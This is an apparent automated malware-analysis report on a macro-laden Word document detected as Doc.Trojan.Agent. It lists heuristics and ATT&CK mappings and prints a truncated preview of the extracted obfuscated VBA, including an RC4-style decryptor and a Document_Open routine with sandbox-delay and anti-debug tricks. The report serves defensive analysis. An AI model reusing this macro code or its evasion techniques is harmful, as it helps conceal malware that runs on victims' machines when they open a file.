MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Trojan.Agent-1383194' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Agent-1383194 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-1383194
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 81974 bytes |
SHA-256: bf4295b2ce7e59bcd0268351a48a8e2b977357936fc67c319ac851512b557dbb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim JfivWS9SZ7WoqhDd(1964) As Long Function KJweeS3op7841P8E(SER7vxeZYI0Q() As Byte, ByVal Xs4I3V9EABN6EK As String) As String On Error Resume Next Dim TQAQPZSYFYsmuf(0 To 255) As Integer, Qw5H2DwqC3hL2g As Long, TS07fruhrS As Long, Uob3No4WhlZ As Long, A00KNrQsV As Byte, UkG22() As Byte, Gf91c() As Byte ReDim UkG22(UBound(SER7vxeZYI0Q)) As Byte UkG22 = SER7vxeZYI0Q Gf91c = StrConv(Xs4I3V9EABN6EK, (32 + 152 + 32 - 152 + 32 + 152 + 32 - 152)) For Qw5H2DwqC3hL2g = 0 To (64 + 105 + 64 - 105 + 64 + 105 + 64 - 105 - 1) TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = Qw5H2DwqC3hL2g Next Qw5H2DwqC3hL2g Qw5H2DwqC3hL2g = 0 TS07fruhrS = 0 Uob3No4WhlZ = 0 For Qw5H2DwqC3hL2g = 0 To (64 + 621 + 64 - 621 + 64 + 621 + 64 - 621 - 1) TS07fruhrS = (TS07fruhrS + TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) + Gf91c(Qw5H2DwqC3hL2g Mod Len(Xs4I3V9EABN6EK))) Mod ((64 + 600 + 64 - 600 + 64 + 600 + 64 - 600)) A00KNrQsV = TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = TQAQPZSYFYsmuf(TS07fruhrS) TQAQPZSYFYsmuf(TS07fruhrS) = A00KNrQsV Next Qw5H2DwqC3hL2g Qw5H2DwqC3hL2g = 0 TS07fruhrS = 0 Uob3No4WhlZ = 0 For Qw5H2DwqC3hL2g = 0 To UBound(SER7vxeZYI0Q) TS07fruhrS = (TS07fruhrS + 1) Mod 256 Uob3No4WhlZ = (Uob3No4WhlZ + TQAQPZSYFYsmuf(TS07fruhrS)) Mod 256 A00KNrQsV = TQAQPZSYFYsmuf(TS07fruhrS) TQAQPZSYFYsmuf(TS07fruhrS) = TQAQPZSYFYsmuf(Uob3No4WhlZ) TQAQPZSYFYsmuf(Uob3No4WhlZ) = A00KNrQsV UkG22(Qw5H2DwqC3hL2g) = U98MGIgy41PxtG(UkG22(Qw5H2DwqC3hL2g), (TQAQPZSYFYsmuf((TQAQPZSYFYsmuf(TS07fruhrS) + TQAQPZSYFYsmuf(Uob3No4WhlZ)) Mod ((64 + 408 + 64 - 408 + 64 + 408 + 64 - 408))))) Next Qw5H2DwqC3hL2g KJweeS3op7841P8E = StrConv(UkG22, (16 + 412 + 16 - 412 + 16 + 412 + 16 - 412)) End Function Function U98MGIgy41PxtG(Ofw3MR, VGqhXSqhj) WZHwd = Year(Now) '26 U98MGIgy41PxtG = (Ofw3MR And Not VGqhXSqhj) Or (Not Ofw3MR And VGqhXSqhj) XfMSsOftg = Year(Now) '51 End Function Function X6kwgMbNgJ(Ak1HZBnpV As Integer) As Boolean CMeq1Qt4lApz = Year(Now) '48 Static Ci2s21H7C As Byte CY23LTC1bd = Year(Now) '82 Ci2s21H7C = Ci2s21H7C + 1 QTs = Year(Now) '87 If Ci2s21H7C = 1 Then Debug.Assert Not X6kwgMbNgJ(39) MEa5IA2DpUk = Year(Now) '60 X6kwgMbNgJ = Ci2s21H7C = 0 OKHIljrqVgp = Year(Now) '98 Ci2s21H7C = 0 I8LqdGeSl = Year(Now) '89 End Function Sub DoYYO2UPaL() YIDVntj3YK2wc = Year(Now) '46 If CDbl(94) = True Then GQaj8PEg = 67 DatePart "EUppxcBiHgB", 75 Log 25 Month 75 FreeFile 96 App.StartLogging "Ct9JP3HTB7K", 85 Err.Clear DoEvents BWELN = LCase(21) IsError 15 MEdt75AApXXWLZ = Year(Now) '67 End Sub Sub Document_Open() JaqGPwoPu48YczqN = Year(Now) '37 On Error Resume Next LWb9ZjskfwlJHS = Year(Now) '74 Dim Ds1jSlIYao5X As Long, RDr2Y As Long, HP85djOxI8AGedne As Long BzvbUy = Year(Now) '44 Ds1jSlIYao5X = 93364438: RDr2Y = 0: HP85djOxI8AGedne = 0 IonXs47akeQMk = Year(Now) '35 For RDr2Y = 1 To Ds1jSlIYao5X HP85djOxI8AGedne = HP85djOxI8AGedne + 1 Next RDr2Y Xt0UUX5QcqO3Ns = Year(Now) '48 If HP85djOxI8AGedne = Ds1jSlIYao5X Then CP7eYRX89Nn = Year(Now) '23 Dim VoF1MHx9 As Integer, PA2YVLe As String For VoF1MHx9 = 4 To 426 PA2YVLe = PA2YVLe + VoF1MHx9 Next Rv1KdBVm1X = Year(Now) '58 If (13.5 + 30 + 13.5 - 30 + 13.5 + 30 + 13.5 - 30 - 1) = (13.5 + 325 + 13.5 - 325 + 13.5 + 325 + 13.5 - 325 - 1) Then DviWOuB = Year(Now) '48 VVkBYsJicw2DlUAmV = Year(Now) '23 If X6kwgMbNgJ(15) = True Then YLArIfSr = Year(Now) '14 HDjs9On9a9Y KwIdzptJqryh = Year(Now) '58 Else Ia5y06lXt1Vs = Year(Now) '86 DoYYO2UPaL NMpb0m = Year(Now) '26 End If Else DVHXbu3ZcQAc = Year(Now) '8 DoYYO2UPaL HYGDr = Year(Now) '71 End If PgeRSvr6icpl = Year(Now) '87 Else KCxZonr18oR = Year(Now) '1 DoYYO2UPaL DcDipOwiUXXXD4 = Year(Now) '29 End If ReCn7 = Year(Now) '87 End Sub Function Ya3FssyIa(ByVal Rpwp7G0fmiW As Variant) As Long YxoXhe8cWBdV1F = ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.